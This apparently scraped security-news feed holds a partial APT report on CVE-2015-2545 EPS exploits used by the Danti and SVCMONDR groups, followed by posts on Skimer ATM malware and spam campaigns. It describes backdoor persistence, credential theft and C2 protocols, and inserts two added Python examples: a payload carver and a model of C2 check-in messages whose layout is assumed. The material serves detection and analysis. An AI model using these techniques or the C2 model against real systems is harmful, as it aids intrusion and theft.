The attachment contains the file “Holidays in India in 2016.docx” with the embedded EPS exploit. This time the attackers used the second variant of the exploit (previously used by the EvilPost and APT16 groups), with minor changes:

  • They removed the part containing the “h:\\test.txt” strings
  • They appended the encrypted binary at the end of the EPS object (as in the third variant of the exploit)

Instead of using the “PdPD” string as the marker for the binary, they used a new identifier: “1111111122222222”

New identifier used

All these changes created a new variant of the exploit, detected by very few antivirus products.
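As an added example (not code from the report), the following Python script carves and decrypts an appended payload of the kind described above: it looks for the “PdPD” marker of the third exploit variant or the “1111111122222222” identifier of the March variant, then brute-forces the single-byte XOR key by testing every candidate for a valid MZ/PE header. The EPS file and the PE embedded in it are constructed for the example. The odd/even byte-swap the report mentions is not reproduced; that is an assumption of the example, and on a real sample the PE check may only pass after that step has also been undone.

```python
"""Carve and decrypt the encrypted PE appended to a CVE-2015-2545 EPS object.

Added example, not code from the report. Locates the "PdPD" or
"1111111122222222" marker and brute-forces the single-byte XOR key by
checking for a valid MZ/PE header. The report's odd/even byte-swap over the
first few hundred bytes is NOT reproduced (assumption: a plain XOR is enough
for the constructed sample below).
"""

# Markers quoted in the report: third exploit variant and March 2016 variant.
MARKERS = (b"PdPD", b"1111111122222222")


def xor1(data: bytes, key: int) -> bytes:
    """Single-byte XOR over the whole buffer."""
    return bytes(b ^ key for b in data)


def find_payload(eps: bytes):
    """Return (marker, offset of the first byte after it), or None if no known marker is present."""
    for marker in MARKERS:
        idx = eps.find(marker)
        if idx != -1:
            return marker, idx + len(marker)
    return None


def looks_like_pe(blob: bytes) -> bool:
    """True if the buffer has an MZ stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def brute_force_key(blob: bytes):
    """Try all 256 single-byte keys; return (key, plaintext) for the first that yields a PE image."""
    for key in range(256):
        plain = xor1(blob, key)
        if looks_like_pe(plain):
            return key, plain
    return None


def carve(eps: bytes):
    """Full pipeline: marker -> brute-forced key -> decrypted PE. Returns a dict or None."""
    hit = find_payload(eps)
    if hit is None:
        return None
    marker, offset = hit
    found = brute_force_key(eps[offset:])
    if found is None:
        return None
    key, plain = found
    return {"marker": marker, "offset": offset, "key": key, "pe": plain}


# --- constructed test data (not a real sample) -------------------------------
# Minimal fake PE: MZ stub, e_lfanew = 0x40, then the PE signature and filler.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x90" * 32
# Fake EPS: PostScript header, shellcode-like filler, the marker and the PE XORed with key 0x5A.
SAMPLE_EPS = (b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n/sc <414243> def\n"
              + b"PdPD" + xor1(FAKE_PE, 0x5A))

if __name__ == "__main__":
    result = carve(SAMPLE_EPS)
    print("marker %r at offset %d, key 0x%02x, PE size %d bytes" % (
        result["marker"], result["offset"], result["key"], len(result["pe"])))
```

Run it against a suspected EPS object (`carve(open(path, "rb").read())`); a hit gives the key and the decrypted image, which can then be hashed and compared with the sample hashes in Appendix B. A miss on a real file most likely means the byte-swap step still has to be reversed before the MZ check.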

The decoy document was created on January 27th, and then modified by adding the EPS exploit on March 28th, right before the attack.

Decoy document

According to its metadata, the document was created and modified by Chinese users:

Decoy´s metadata

March attack – payload

The dropped file is a RarSFX archive (331307 bytes). According to comments in the archive, this was also created by a Chinese user:

The dropper installs four files in the system. The “Appinfo.dat” file launches “PotPlayerMini.exe”, monitors the memory periodically with the GlobalMemoryStatus API function and writes the results to “C:\windows\memstatus.txt”

The main loader “PotPlayerMini.exe” is a legitimate multimedia player from Daum Communication. The file is signed with a legitimate signature from “Daum Communications Corp.”

Digital signature information

This legitimate file is used by the attackers to load a malicious, unsigned file from the same folder: PotPlayer.dll (the hardcoded PDB path inside is “C:\Users\john\Desktop\PotPlayer\Release\PotPlayer.pdb”). This, in turn executes appinfo.dat (the hardcoded PDB path inside is “D:\BaiduYunDownload\ServiceExe\Release\ServiceExe.pdb”), which is a Yoda-compressed binary. The backdoor code is stored inside update.dat.

The potplayer.dll “PreprocessCmdLineEx” export function:

  • Creates a service named “MemoryStatus” whose path points to the “appinfo.dat” file, and registers an autorun entry named “potplayer” under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
  • Opens the “update.dat” file, decrypts it with XOR operations and passes execution to the resulting buffer.

“update.dat”, the backdoor:

Makes its first GET request to the hardcoded CnC “” in order to receive the address of the new CnC in the response.

If a 407 response code is returned (Proxy Authentication Required), the sample repeats the request using the string “proxyname” as the proxy username and “proxypass” as the proxy password. This suggests the sample was produced with a builder in which these parameters must be set manually, and that in this specific sample they were left at their defaults.

Finds the substring “8FC628C9F43D42E2B77C2801518AF2A5” in the response and decrypts it with AES in CTR mode three times in succession, using three different 16-byte keys.

Makes a POST request to the new CnC with the URL parameter “im=validate” and expects the string “success” in the response.

Forms the following structure, AES-encrypts it and sends it to the CnC in a POST request:

  • “CFB4CDE8-9285-4CC2-ACE2-CD9CCDF22C0D” string
  • Local IP
  • Host name
  • 0x3E9 dword
  • OS version
  • SYSTEM_INFO structure

Decrypts the response using AES with one key. Depending on the command in the decrypted response, the sample then:

  • Passes execution to the new buffer
  • Enumerates drives and their type
  • Enumerates given registry key and value
  • Enumerates processes
  • Deletes given file
  • Creates given process
  • Writes to file and launches it
  • Enumerates services
  • Terminates given process
  • Provides shell via cmd.exe

The malware connects to the following C2s:

  • (
  • (

The connection:

The two hosts are dynamic DNS subdomains, using the provider CHANGEIP DNS.

SVCMONDR: the Taiwan case

In December 2015, we uncovered another example of the type of shellcode found in the exploit for CVE-2015-2545. On 11 December, a spear-phishing email was sent by attackers to an employee of a Taiwanese security software reseller.

Spear-phishing email

The attachment contained a Web Archive File with “1-3說明檔.doc” and a malicious EPS file inside.


This EPS (98c57aa9c7e3f90c4eb4afeba8128484) exploits CVE-2015-2545 and contains an encrypted binary starting with “PdPD” (50 64 50 44), the same marker seen in the Danti attacks.

The structure of the Web Archive also references the same files as in the Danti attacks (“image002.gif” and “image002.eps”). However, the files themselves are absent from the archive.

Part of the Web Archive

This resemblance could mean that we can attribute this case to the Danti group. However, it could also be a coincidence or yet another case of different groups using the same malicious code. That’s why we are noting this incident separately from the Danti group’s activity.

Interestingly, in the first few days of December, another group – APT16 (FireEye’s classification) also targeted Taiwan-based organizations with a CVE-2015-2545 EPS exploit, and its emails originated from the same domain as the one sent by the SVCMONDR attackers. However, it used another type of shellcode and a different backdoor – ELMER.

After opening the doc file (which is again a Web Archive File), the exploit drops and executes the Trojan program “svcmondr.exe” (8052234dcd41a7d619acb0ec9636be0b).

This queries the registry values:

“HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings” and compares them. If they differ, it copies the “DefaultConnectionSettings” value from the HKEY_USERS key to the HKCU key.

It likewise copies the values of:

  1. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022C854F}
  2. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C80120}
  3. HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10

to the corresponding HKCU keys (for example HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022C854F}, etc.).

It then forms a structure to send to the CnC in a POST request, with the following fields:

  • 0x8888 constant
  • 0x8000 constant
  • 18-byte hex string derived from the CoCreateGuid function
  • Local IP
  • MAC address

It encodes the resulting structure with base64. Example of a POST request (headers only; the body is not reproduced here):

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Content-Length: 112
Connection: Keep-Alive
Cache-Control: no-cache


Based on the CnC response, the sample:

  • Checks the password in the CnC response and compares it with the hardcoded password “1010” in its configuration structure. If the password is valid, it sets a “certified” flag and can further process the following commands.
  • Launches given command line with ShellExecute, writes output results to %tmp% file, sends results to CnC and deletes the file.
  • Downloads file to %Temp% folder.
  • Uploads given file to CnC.
  • Sets sleep interval.

All results sent to the CnC after processing commands are encrypted with RC4 with a MAC-address as a key.
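As an added example (not code from the report), the following Python module models the SVCMONDR check-in message and result encryption described above, in the form a defender would use to triage captured POST bodies. The field order follows the report (0x8888, 0x8000, 18-byte hex string from CoCreateGuid, local IP, MAC address, then base64); the field widths and byte order are assumptions of the example (two little-endian DWORDs, 18 ASCII hex characters, a 4-byte IP and a 6-byte MAC), which is why its 36-byte body is shorter than the 112-byte body in the captured request. Results are RC4-encrypted with the MAC address as key, as the report states; using the raw six MAC bytes as the key is likewise an assumption. The MAC, IP and GUID values are constructed.

```python
"""Model of the SVCMONDR check-in message and RC4 result encryption.

Added example, not code from the report. Field widths and byte order are
ASSUMED (see the lead-in); only the field order, the two magic constants and
the "RC4 keyed with the MAC address" detail come from the analysis.
"""
import base64
import socket
import struct
import uuid

MAGIC1, MAGIC2 = 0x8888, 0x8000      # constants at the head of the structure (from the report)
BODY_LEN = 4 + 4 + 18 + 4 + 6        # assumed layout: DWORD, DWORD, 18 hex chars, IPv4, MAC


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_checkin(local_ip: str, mac: bytes, guid_hex: str = "") -> str:
    """Pack the check-in structure and base64-encode it, as the implant does before the POST."""
    if not guid_hex:
        guid_hex = uuid.uuid4().hex[:18]   # stand-in for the CoCreateGuid-derived string
    if len(guid_hex) != 18 or len(mac) != 6:
        raise ValueError("guid_hex must be 18 hex chars and mac 6 bytes")
    raw = (struct.pack("<II", MAGIC1, MAGIC2)
           + guid_hex.encode("ascii")
           + socket.inet_aton(local_ip)
           + mac)
    return base64.b64encode(raw).decode("ascii")


def parse_checkin(body: str):
    """Decode a captured POST body; returns the fields, or None if it is not a check-in in this layout."""
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError:                 # binascii.Error is a ValueError subclass
        return None
    if len(raw) != BODY_LEN:
        return None
    magic1, magic2 = struct.unpack_from("<II", raw, 0)
    if (magic1, magic2) != (MAGIC1, MAGIC2):
        return None
    return {
        "guid": raw[8:26].decode("ascii", errors="replace"),
        "ip": socket.inet_ntoa(raw[26:30]),
        "mac": raw[30:36],
    }


def encrypt_result(mac: bytes, output: bytes) -> bytes:
    """Command output as sent back to the CnC: RC4 keyed with the MAC address."""
    return rc4(mac, output)


def decrypt_result(mac: bytes, blob: bytes) -> bytes:
    """Recover command output from a capture, given the victim's MAC (e.g. taken from its check-in)."""
    return rc4(mac, blob)


if __name__ == "__main__":
    mac = bytes.fromhex("001122334455")                      # constructed value
    body = build_checkin("192.168.1.10", mac, "0123456789abcdef01")
    print("POST body:", body)
    print("parsed:   ", parse_checkin(body))
    blob = encrypt_result(mac, b"Volume in drive C has no label.")
    print("encrypted result:", blob.hex())
    print("decrypted:       ", decrypt_result(mac, blob))
```

The practical value of the model is the key-recovery path: because the MAC address travels in the clear in the first check-in, a full capture of one session gives the RC4 key for every result message that follows, so `decrypt_result` can be run over the remaining POST bodies without any host access.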

The CnC points to an IP address in Hong Kong. This IP address belongs to a local private company, but falls within a range of IP addresses that belong to another enterprise that has already been identified as a host location for command and control servers that communicate with malware.

The CnC has been used in other APT incidents, attributed by FireEye to the group “admin@338” aka “Temper Panda” (,

In general, this IP address space from “New World Telecom HK” is one of the favorite places used by different Chinese-origin APT groups to host command & control servers/proxies.

Another detail suggesting a possible relationship between SVCMONDR and Temper Panda is the use of the “PdPD” (50 64 50 44) marker for encrypted binaries. According to Crowdstrike, the same marker has been used previously by a number of APT groups (Anchor Panda, Samurai Panda and Temper Panda).

The latest known activity of “admin@338” was in August 2015, when it was used to target Hong Kong-based media using its own tools, LOWBALL and BUBBLEWRAP.

However, we are unable to draw any conclusion regarding the relationship between the SVCMONDR group and Temper Panda.

According to KSN data, in addition to Taiwan, there are some SVCMONDR victims in Thailand.


We are currently aware of at least four different APT actors actively using exploits of the CVE-2015-2545 vulnerability: TwoForOne (also known as Platinum), EvilPost, APT16 and Danti.

These groups have their own toolsets of malicious programs. Danti’s arsenal is more extensive than those of EvilPost and APT16, and in terms of functionality can be compared with Platinum. All the groups are focused on targets in the Asian region and have never been seen in incidents in Western Europe or the USA.

The TwoForOne (Platinum) group is described in Microsoft research, APT16 in FireEye reports, and EvilPost and Danti in Kaspersky Lab private reports.

Danti is highly focused on diplomatic entities. It may already have full access to internal networks in Indian government structures. According to Kaspersky Security Network, some Danti Trojans have also been detected in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

Despite the fact that Danti uses a 1-day exploit, the group is able to make its own modifications to bypass current antivirus detections. A number of the modules used by Danti have the same functionality as previously known and used malicious programs like NetTraveller and DragonOK.

The use of CVE-2015-2545 exploits is on the rise. In addition to the groups mentioned above, we have seen numerous examples of these exploits being used by traditional cybercriminals in mass mailings in February-April 2016. Such attacks mostly target financial institutions in Asia. Specifically, attacks have been recorded in Vietnam, the Philippines and Malaysia. There are reasons to believe that Nigerian cybercriminals are behind these attacks. In some cases, the infrastructure used is the same as the one we saw when analyzing the Adwind Trojan.

We expect to see more incidents with this exploit and we continue to monitor new waves of attacks and the potential relationship with other attacks in the region.

To know more about how to address the issue of known vulnerabilities most properly, read this post in the Kaspersky Business Blog.

Additional references:

The EPS Awakens
Part 1
Part 2

Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets

New Poison Ivy Rat Variant targets Hong-Kong-Pro-Democracy Activists

Microsoft research “Platinum”

EvilPost attacks (Kaspersky Lab Private Report, March 2016)

Appendix A: EPS objects, their payload and http.exe trojan analysis

EPS objects

File MD5: a90a329335fa0af64d8394b28e0f86c1
File type: Encapsulated Postscript File
Size: 189’238 bytes
File Name: image001.eps (from HQ list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: 07f4b663cc3bcb5899edba9eaf9cf4b5
File type: Encapsulated Postscript File
Size: 211’766 bytes
File Name: image001.eps (from Mission list)

This EPS file contains a shellcode that decrypts and saves file “lsass.exe” and decoy document to disk.

The dropped malicious files are described below.

File MD5: b751323586c5e36d1d644ab42888a100
File type: Encapsulated Postscript File
Size: 398’648 bytes
File Name: image001.eps (from India’s 10 Top Luxury Hotels)

This EPS file contains a shellcode that decrypts and saves the dropper file (Windows CAB) and decoy document to disk.

The dropper and dropped malicious file “http.exe” are described below.

Payload analysis

Backdoor

File Name: lsass.exe
MD5: 8ad9cb6b948bcf7f9211887e0cf6f02a
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Compilation timestamp: 2015-12-28 07:47:54
PE Resources: BIN (CHINESE SIMPLIFIED)
Size: 138’240 bytes

URL: http://goback.strangled[.]net:443/ [random string]
USER AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Real IP:

Drops file from its resource section to %ALLUSERSPROFILE%\ IEHelper\mshtml.dll. The backdoor then writes a string to a given offset with the value dependent on the %ALLUSERSPROFILE% environment variable.

Thus, the md5 of dropped files can vary. Examples of md5 with standard variables:


Sets registry:

If user is not admin

“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, value {53372C34-A872-FACF-70A7-A23C81C766C4} = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\IEHelper\mshtml.dll, IEHelper”

In any case:

“HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{53372C34-A872-FACF-70A7-A23C81C766C4}”, value “StubPath” = “C:\Windows\System32\rundll32.exe %ALLUSERSPROFILE%\IEHelper\mshtml.dll, IEHelper”

Sets the following values before creating the instance of IE for communicating with the CnC:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = 1
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Check_Associations = ”no”
HKEY_CURRENT_USER\Software\Microsoft\Internet Connection Wizard\Completed = 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEHarden = 0

Collects the following info, encodes with base64 and sends to the CnC:

  • Memory status
  • OS version
  • User name
  • OEM code page identifier
  • Local IP
  • CPU speed

Forms the following body in POST request to the CnC:

Content-Disposition: form-data; name=”m1.jpg”
Content-Type: application/octet-steam

Where %x – decrypted adapter’s MAC address based on xor operation.

The URL path in the POST request is generated randomly with uppercase letters.

Example of CnC communication:

Based on the CnC response, the sample:

  • Provides shell via cmd.exe
  • Creates directory
  • Lists files in directory
  • Deletes file
  • Uploads given file to CnC
  • Enumerates drives, gets their type and available space
  • Launches given file
  • Moves file
  • Writes and appends to given file
  • Uninstalls itself

File Name: mshtml.dll
MD5: be0cc8411c066eac246097045b73c282 or bae673964e9bc2a45ebcc667895104ef (or another value, see above)
File type: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
Compilation timestamp: 2015-12-28 07:45:20
Size: 72’192 bytes

mshtml.dll reproduces the entire functionality of its dropper (CnC communication and command processing) in its “IEhelper” export and is built from the same source code.

http.exe trojan

Dropper (from CAB archive)
MD5: 6bbdbf6d3b24b8bfa296b9c76b95bb2f
Timestamp: Sun, 13 Apr 2008 18:32:45 GMT

Drops file to %Temp%\IXP000.TMP\http.exe and launches it.

Filename: http.exe
MD5: 3fbe576d33595734a92a665e72e5a04f
Timestamp: Wed, 13 Jan 2016 10:25:10 GMT
CnC:

Sets registry:

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

“IME_hp” = %ALLUSERPROFILE%\Accessories\wordpade.exe

Copies itself to %ALLUSERPROFILE%\Accessories\wordpade.exe, launches it and exits self-process.

wordpade.exe file proceeds:

Creates mutex “Global\wordIE”. Stores keystrokes and windows titles to %Temp%\dumps.dat and xors it with 0x99.

Knocks to CnC via IE instance:

Includes the following field in HTTP-header:

Cookie: ID=1%x, where %x – Volume Serial number of disk C

Based on the CnC response, the sample:

  • Provides shell via cmd.exe
  • Lists files in all drives and writes to given file
  • Retrieves OS version, Local IP, installed browser, Computer name, User name and writes to given file
  • Writes to given file
  • Deletes given file
  • Uploads given file to CnC
  • Makes screenshots and writes to file %Temp%\makescr.dat
  • Retrieves proxy settings and proxy authentication credentials from Mozilla (signons.sqlite, logins.json) and Chrome files (%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data), Microsoft WinInet storage, Microsoft Outlook

Appendix B: Danti sample hashes

aae962611da956a26a76d185455f1d44 (
3ed40dec891fd48c7ec6fa49b1058d24 (
1aefd1c30d1710f901c70be7f1366cae (
f4c1e96717c82b14ca76384cb005fbe5 (India,
1ba92c6d35b7a31046e013d35fa48775 (India,
6d55eb3ced35c7479f67167d84bf15f0 (India, Cabinet Secretary)

Doc (Web Archive File):
c591263d56b57dfadd06a68dd9657343 (HQ List)
aebf03ceaef042a833ee5459016f5bde (Mission List)
fd6636af7d2358c40fe6923b23a690e8 (India’s 10 Top Luxury Hotels)

d91f101427a39d9f40c41aa041197a9c (Holidays in India in 2016)

07f4b663cc3bcb5899edba9eaf9cf4b5 (India, from Mission list)
a90a329335fa0af64d8394b28e0f86c1 (India, HQ List)
b751323586c5e36d1d644ab42888a100 (India, Hotels)
8cd2eb90fabd03ac97279d398b09a5e9 (Holidays in India in 2016)

CAB dropper:


f16903b2ff82689404f7d0820f461e5d (clean tool)

6bbdbf6d3b24b8bfa296b9c76b95bb2f (dropper, from cab-archive)
3fbe576d33595734a92a665e72e5a04f (http.exe)
8ad9cb6b948bcf7f9211887e0cf6f02a (lsass.exe)
be0cc8411c066eac246097045b73c282 (mshtml.dll)
d44e971b202d573f8c797845c90e4658 (update.dat)
332397ec261393aaa58522c4357c3e48 (potplayer.dll)
2460871a040628c379e04f79af37060d (appinfo.dat)

Goback.strangled[.]net:443[.]org (,
newsupdate.dynssl[.]com (
dnsnews.dns05[.]com (

Appendix C: sample hashes of SVCMONDR attacks

7a60da8198c4066cc52d79eecffcb327 (Taiwan,

Doc (Web Archive File):
d0533874d7255b881187e842e747c268 (Taiwan, 1-3說明檔.doc)

98c57aa9c7e3f90c4eb4afeba8128484 (Taiwan)

8052234dcd41a7d619acb0ec9636be0b (svcmondr.exe, Taiwan)
046b98a742cecc11fb18d9554483be2d (svcmondr.exe, Thailand)


Lock Your Mobile Devices

SANS Tip of the Day - Mon, 05/23/2016 - 01:00
The number one step for protecting your mobile device is making sure it has a strong passcode or password lock on it so only you can access it.

Trust Your Instincts

SANS Tip of the Day - Fri, 05/20/2016 - 01:00
Ultimately, common sense is your best protection. If an email, phone call or online message seems odd, suspicious or too good to be true, it may be an attack.

ATM infector

Malware Alerts - Tue, 05/17/2016 - 06:57

Seven years ago, in 2009, we saw a completely new type of attack on banks. Instead of infecting the computers of thousands of users worldwide, criminals went directly after the ATM itself – infecting it with malware called Skimer. Seven years later, our Global Research and Analysis Team together with Penetration Testing Team have been called on for an incident response. They discovered a new, improved, version of Skimer.

Virus style infections

Criminals often obscured their malware with packers to make analysis more difficult for researchers. The criminals behind Skimer also did this, using the commercially available packer Themida, which packs both the infector and the dropper.

Once the malware is executed it checks whether the file system is FAT32. If it is, it drops the file netmgr.dll in the folder C:\Windows\System32. If it is an NTFS file system, the same file is placed in an NTFS alternate data stream attached to the XFS service’s executable file. Placing the file in an NTFS data stream is most likely done to make forensic analysis more difficult.

After successful installation, the sample patches the XFS executable (SpiService.exe) entry point, in order to add a LoadLibrary call to the dropped netmgr.dll file. This file is also protected by Themida.

Entry point in SpiService.exe before infection

Entry point in SpiService.exe after infection

After a successful installation the ATM is rebooted. The malicious library will be loaded into the SpiService.exe thanks to the new LoadLibrary call, providing it with full access to XFS.


Unlike Tyupkin, where there was a magic code and a specific time frame where the malware was active, Skimer only wakes up when a magic card (specific Track 2 data, see IOCs at the bottom of this blogpost) is inserted. It is a smart way to implement access control to the malware’s functionality.

Once the magic card is inserted, the malware is ready to interact with two different types of cards, each with different functions:

  1. Card type 1 – request commands through the interface
  2. Card type 2 – execute the command hardcoded in the Track2

After the card is ejected, the user is presented with a form asking them to enter the session key within 60 seconds. Once authenticated, the user can control the malware’s activity with 21 different codes, entered from the PIN pad.

Below is a list of the most important features:

  1. Show installation details;
  2. Dispense money – 40 notes from the specified cassette;
  3. Start collecting the details of inserted cards;
  4. Print collected card details;
  5. Self delete;
  6. Debug mode;
  7. Update (the updated malware code is embedded on the card).

During its activity, the malware also creates the following files or NTFS streams (depending on the file system type). These files are used by the malware at different stages of its activity, such as storing the configuration, storing skimmed card data and logging its activity:

  • C:\Windows\Temp\attrib1: card data collected from network traffic or from the card reader
  • C:\Windows\Temp\attrib4: logs data from the different APIs responsible for communication with the keyboard (effectively logging data such as the PIN)
  • C:\Windows\Temp\mk32: same as attrib4
  • C:\Windows\Temp:attrib1: same as the homologue file
  • C:\Windows\Temp:attrib4: same as the homologue file
  • C:\Windows\Temp:mk32: same as the homologue file
  • C:\Windows\Temp:opt: logs the mule’s activity

Main window

The following video details the scenario on how money mules interact with an infected ATM as described above.


During our recent Incident Response cases related to the abuse of ATMs, we have identified Tyupkin, Carbanak and black box attacks. The evolution of Backdoor.Win32.Skimer demonstrates the attacker interest in these malware families as ATMs are a very convenient cash-out mechanism for criminals.

One important detail to note about this case is the hardcoded information in the Track2 – the malware waits for this to be inserted into the ATM in order to activate. Banks may be able to proactively look for these card numbers inside their processing systems, and detect potentially infected ATMs, money mules, or block attempts to activate the malware.

We also recommend regular AV scans, the use of whitelisting technologies, a good device management policy, full disk encryption, the protection of ATM BIOS with a password, only allowing HDD booting, and isolating the ATM network from any other internal bank networks.

Kaspersky Lab has now identified 49 modifications of this malware, with 37 of these modifications targeting ATMs made by just one manufacturer. The most recent version was discovered at the beginning of May 2016.

All samples described are detected by Kaspersky Lab as Backdoor.Win32.Skimer. Patched SpiService.exe files are detected as Trojan.Win32.Patched.rb

As this is still an ongoing investigation, we have already shared the full report with different LEAs, CERTs, financial institutions and Kaspersky Lab Threat Intelligence-Service customers. For more information please contact

Appendix I. Indicators of Compromise Hashes




Track 2 data


The Rio Olympics: Scammers Already Competing

Malware Alerts - Mon, 05/16/2016 - 06:56

A few years ago, spammers and scammers were not as interested in the Olympics as they were in football (the World Cup and European Championships). The first major increase in the number of spam messages devoted to the Olympic Games occurred in the run-up to the Winter Olympics in Sochi in 2014. Since then, their interest in the Olympics has shown no sign of weakening and the upcoming event in Brazil is no exception.

Back in 2015, a year before the Olympics in Rio, we registered fake notifications of lottery wins allegedly organized by the country’s government and the International Olympic Committee. Similar emails continue to be sent in 2016. The vast majority of these messages contain a DOC or PDF attachment, while the body of the message includes only a brief text asking the recipient to open the attachment.

The name of the DOC file, the name of the sender and the subject line of the email often mention the Olympic Games.

The content of these attachments is fairly standard: a lottery was held by an official organization; the recipient’s address was randomly selected from a large number of email addresses, and to claim their winnings the recipient has to respond to the email and provide the necessary personal information.

We also came across emails without attachments; the text written by the scammers was included in the body of the message.

English is undoubtedly the most popular language used in fraudulent emails exploiting the Olympics theme, but we have also registered messages in other languages, for example Portuguese. In these the spammers stuck to the same story of a lottery win, trying to convince the recipient that the email is genuine.

In addition to fraudulent spam, we have registered unsolicited advertising messages containing offers for various goods and services that, one way or another, use the Olympics to grab the attention of recipients.

For example, spammers have been pushing new TVs for watching sporting events.

They also promised to make the recipient an “Olympic champion” with the help of magic pills.

Taking any of these emails seriously enough to reply to them could well leave you out of pocket. But the biggest hit that sporting fans’ wallets are likely to take are from fake ticketing services. We are constantly blocking dozens of newly registered domains with names containing the words “rio”, “rio2016” and so on. Each of these domains hosted good quality imitations of official services offering tickets to sporting events at this summer’s games in Rio de Janeiro.

The scammers register these domains to make their sites look more credible; for the same purpose, they often buy the cheapest and simplest SSL certificates. Such domain-validated certificates are issued within minutes, and the certification authority checks only that the applicant controls the domain, not the legal existence of the organization requesting the certificate. The certificate simply enables encrypted transport for the domain and, most importantly, gives the fraudsters the desired “https” at the beginning of their address.

If you examine the whois data for such domains, you will find that they have only been registered recently, for a short period of time (usually a year) and in the names of individuals. Moreover, the detailed information is often hidden, and the hosting provider could be located anywhere, from Latin America to Russia.

The sites are necessary to implement a simple scam whereby the phishers ask for bank card information, allegedly to pay for tickets, and then use it to steal money from the victim’s bank account. In order to keep the buyer in the dark for some time, the scammers assure them that the payment has been received for the tickets and that they will be sent out two or three weeks before the event.

As a result, the criminals not only steal the victim’s money but deprive them of the chance of attending the Olympics – by the time they realize they won’t be getting the tickets they booked it will be too late to buy genuine tickets… especially if there’s no money in their bank account.

According to our information, the creation of these fake sites usually involves international cybercriminal groups, each fulfilling its own part of the scam. One group creates a website, the second registers the domains, the third collects people’s personal information and sells it, and the fourth withdraws the cash.

To avoid falling victim to the scammers’ tricks, sports fans should be careful and only buy tickets from authorized reseller sites and ignore resources offering tickets at very low prices. The official website of the Olympic Games provides a list of official ticket sellers in your region and a service that allows you to check the legitimacy of sites selling tickets.

Also, we strongly recommend not buying anything in stores advertised in spam mailings or advertising banners, whether it’s tickets or souvenirs related to the Olympics. At best, you’ll end up with non-certified goods of dubious quality, and at worst – you’ll just be wasting your money. For those who cannot resist impulse purchases, we recommend getting a separate bank card that is only used for online payments and which only ever has small sums of money on it. This will help to avoid serious losses if your banking information is stolen.

Spam and phishing in Q1 2016

Malware Alerts - Thu, 05/12/2016 - 06:56

Spam: features of the quarter

Trending: dramatic increase in volume of malicious spam

The first quarter of 2016 saw a dramatic increase in the number of unsolicited emails containing malicious attachments. Over the last two years the number of email antivirus detections on computers with a Kaspersky Lab product installed fluctuated between 3 and 6 million. At the end of 2015 this number began to grow and in early 2016 there was a sharp upturn.

Number of email antivirus detections on computers with a Kaspersky Lab product installed

In March, the number of email antivirus detections reached 22,890,956, which is four times more than the average for the same period last year.

With the rise of drive-by-downloads, we could have expected malicious email attachments to have long since given way to malicious sites that the user accesses via a link in an email. However, the use of emails has its advantages (for the attackers): the content of the email may encourage the user not only to download a malicious file but also launch it. It’s also possible that malicious attachments are enjoying a new wave of popularity because in the last couple of years the developers of the most popular browsers have considered adding protection against infected and phishing websites (using in-house developments as well as partnering with well-known anti-virus vendors). This is something that built-in protection at the email client level does not provide yet. Therefore, if a potential victim doesn’t use antivirus software, their computer can be easily infected via email.

What’s inside?

The variety of malicious attachments is impressive. They include classic executable EXE files and office documents (DOC, DOCX, XLS, RTF) with embedded malicious macros, and programs written in Java and JavaScript (JS files, JAR, WSF, WRN, and others).

Attachment containing a Trojan downloader written in Java

Also worth noting is the diversity of languages used in malicious spam. In addition to English, we regularly came across emails in Russian, Polish, German, French, Spanish, Portuguese and several other languages.

Attachment containing the Trojan banker Gozi

Most emails imitated notifications of unpaid bills, or business correspondence.

The malicious .doc file in the attachment is a Trojan downloader. It downloads and runs the encryptor Cryakl using macros written in Visual Basic.

Attachment containing backdoor-type malware that downloads other malicious programs to the infected machine

